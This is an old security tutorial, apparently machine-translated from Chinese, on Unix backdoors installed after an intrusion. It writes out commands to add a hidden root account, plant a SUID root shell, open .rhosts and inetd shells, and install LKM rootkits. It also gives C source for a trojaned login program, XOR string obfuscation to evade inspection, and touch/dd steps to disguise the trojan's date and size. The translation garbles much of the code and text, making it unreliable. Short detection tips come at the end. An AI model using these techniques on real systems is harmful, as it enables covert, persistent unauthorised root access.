Mail:
e4gle@whitecell.org
Page:
http://www.whitecell.org
Copyright: WhiteCell Security Systems
Overview
Back door introduction Commonly used back door technology latte test example: Login latter back door profile
After the intruder fully controls the system, it is a technology adopted for the next entry. It is generally implemented by modifying system profiles and installing third-party back door tools. It has concealed, to bypass the system log, is not easy to be discovered by the system administrator. Commonly used back door technology
Increase super user account crack / sniffing user password Place Suid Shell Rhosts Using System Services TCP / UDP / ICMP Shell crontab Timers Shared library file toolkit Rootkit can load kernel module (LKM) Add super user
# echo "E4GLE: X: 0: 0 :: /: / bin / sh" >> / etc / passwd # echo "E4GLE: - 1: -1: -1: -1: -1: -1: 500 ">> / etc / shadow If the system does not allow UID = 0 users to log in remotely, it is also necessary to add a normal user account. Crack / sniffing user password
After getting a Shadow file, use the John The Ripper tool to crack the weak user password. Install Sniffit and other sniffing tools, listen to ports such as Telnet, FTP, collect user passwords. Place Suid Shell
# cp / bin / bash /dev/.rootshell # chmod u s /dev/.rootshell Ordinary users run /dev/.rootshell to get a root privilege. Rhosts
# echo " "> /.rhosts # rsh -l root victim.com csh -i remote can get a rootshell. Using system service procedures
Modify /etc/inetd.conf, Daytime Stream TCP NOWAIT / BIN / SH SH -I SHEN Program Replaces In.Telnetd, In.rexecd, etc. Inted Sergers Redirect Login Programs TCP / UDP / ICMP Shell
Bindshell, most of which is a network service program based on TCP / UDP protocol, listening to high-port, is easy to discover. Ping Backdoor, activates the back door via the ICMP package to form a shell channel. The TCP ACK packets can pass through the fire wall. Crontab Timers
Time-running through the Crontab program is scheduled to run, generally in late night, is the time when the system administrator is not online. Shared library file
In the shared library, embed the rear gate function, use the latter door to activate the shell, get the permissions to avoid the system administrator to the two-pieces of the check toolkit Rootkit
Contains a series of systems and back door tools: - Clear login records in the log - Camouflage checksum - Replace NetStat, PS and other network tools - Back door login programs are easy to install and use can load kernel modules (LKM)
LKM: Loadable Kernel Modules Dynamic loading, no need to recompile the kernel. Intercept system call, have powerful features such as hidden directory, file, process, network connection. It is good to have a good concealment. The famous LKM package has Adore and KNARK. The detection of the latter door With its own experience, combined with specific tools, hand working some tests. Check the system using TripWire or MD5 check. Monitor the suspicious network connection to the target machine with the IDS system. Example: Login lattime
The intruder first backs up the original / bin / login and replaces / bin / login with a section. When the invader Telnet logs in, the correct back door password is passed through environment variables or terminal types, and will directly get a shell; if it is a normal user login, it will redirect to the original login file to handle normal logins. The simplest Login back door ulogin.c source code is as follows: example: login back door
#include
Main (argc, argv, envp) int Argc; char ** argv, ** envp; {char * display = getenv ("display"); if (display == null) {EXECVE (_Path_Login, Argv, ENVP); Perror (_Path_Login); exit (1);} if (! Strcmp (display, password)) {system ("/ bin / csh"); exit (1);} execve (_path_login, argv, eNVP); exit (1) Use the back door login
First, Telnet service is open, on your machine: Bash $ export display = password bash $ telnet victim.com trying xxx.xxx.xxx.xxx ... connected to victim.com (xxx.xxx.xxx.xxx). Escape Character is '^]'.% _ Strings command
The strings command can print the displayed string in the binary, used for Ulogin programs just now: Bash $ strings ulogin /lib/ld-linux.so.2 .............. display / sbin / logins password / bin / csh encryption rear door password (1)
1. Use the DES algorithm, the Crypt () function, write gen.c program: #include
The use or (xor) algorithm indicates a string in hexadecimal mode to achieve the effect of Non-Printable 1. The encoding program Encode.c is as follows: Encryption rear door password (2)
Char Magic [] = "/ x71 / x67 / x6d / x7a / x65 / x61 / x7a"; char * de (char * str, char * key) {INT i = 0, J = 0, Len; Len = Strlen Key); while (STR [i]! = '/ 0') {STR [i] ^ = key [j]; j ; if (j == len) j = 0; i ;} return str;} void display (CHAR * STR) {INT i; for (i = 0; I 2, compiler ENCODE, sequentially perform the result of the key string and MAGIC string or after, such as the original login file name / sbin / xlogin, after passing or later: / x5e / x14 / xf / x13 / xb / x4e / x2 / x1d / x8 / xa / x13 / xb 3, in the back door source code: char login [] = "/ x5e / x14 / xf / x1d / x8 / xa / x 13 / XB "; then inserted or function char * de () combines the same MAGIC string to determine the correct back door password. Use the strings command to see the password, path and other strings. Last modification (1) The Strings output similar to the back door program Ulogin is similar to the Strings output of the normal login. In addition to adding a string array char strings [] = ""; result. Increasingly increasing, increasing. Last modification (2) Adjust the file date, size and other attributes: 1, date # ls -l / sbin / xlogin -r-sr-xr-x root root 19300 Feb 11 1998 / sbin / xlogin # Touch -t 199802110000 Ulogin # _ final modification (2) 2, adjust the size # ls -l ulogin / sbin / xlogin -r-sr-xr-x root root 7542 Feb 11 1998 Ulogin -R-SR-XR-X root root 19300 Feb 11 1998 / sbin / xlogin # bc 19300- 7542 11758 # dd if = / sbin / xlogin of = / tmp / t bs = 11758 count = 1 1 0 Records in 1 0 Records out 11758 bytes Transferred in 0.000379 SECS (31016746 BYtes / sec) # CAT / TMP / T >> Detection of Ulogin Login Use the command MD5SUM to check the existing / bin / login file, compare with previous values. RPM check using Red Hat Linux: # rpm -v util-linux In the case where the intruder has used the latter login, WHO is not a user, check the system process, check Login -h xxx.xxx.xxx. XXX word.
